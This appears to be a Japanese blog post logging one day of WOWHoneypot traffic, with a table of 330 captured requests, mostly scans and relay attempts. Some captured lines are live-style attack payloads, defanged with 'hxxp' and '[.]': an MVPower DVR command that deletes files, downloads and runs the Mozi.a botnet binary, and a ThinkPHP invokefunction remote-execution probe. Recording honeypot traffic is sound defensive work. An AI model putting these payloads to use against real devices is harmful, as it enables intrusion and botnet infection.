WOWHoneypot観察(351日目)
2020/03/03(火)
トータルは330件でした。
ハンティングログは以下です。
49.143.32[.]6 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.a |
件数 | 概要 | リクエスト |
---|---|---|
234 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
51 | アクセス | GET / |
15 | 調査 | GET /is_test |
4 | 不正中継の調査 | GET hxxp[:]//110.249.212.46/testget?q=23333&port=8080 |
3 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
2 | 不明 | GET /hudson |
2 | 不正中継の試み | CONNECT www.ipip.net:443 |
2 | 不正中継の試み | CONNECT www.baidu.com:443 |
2 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
2 | 不正中継の試み | CONNECT cn.bing.com:443 |
1 | Strutsの調査 | POST /login.action |
1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
1 | 調査 | OPTIONS / |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | 調査 | GET /version |
1 | MVPower DVRなどの脆弱性を狙った通信 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
1 | phpMyAdminの調査 | GET /phpmyadmin/ |
1 | Outlookのログインページの調査 | GET /owa/auth/logon.aspx |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | 不正中継の試み | CONNECT fortnite-public-service-prod11.ol.epicgames.com:443 |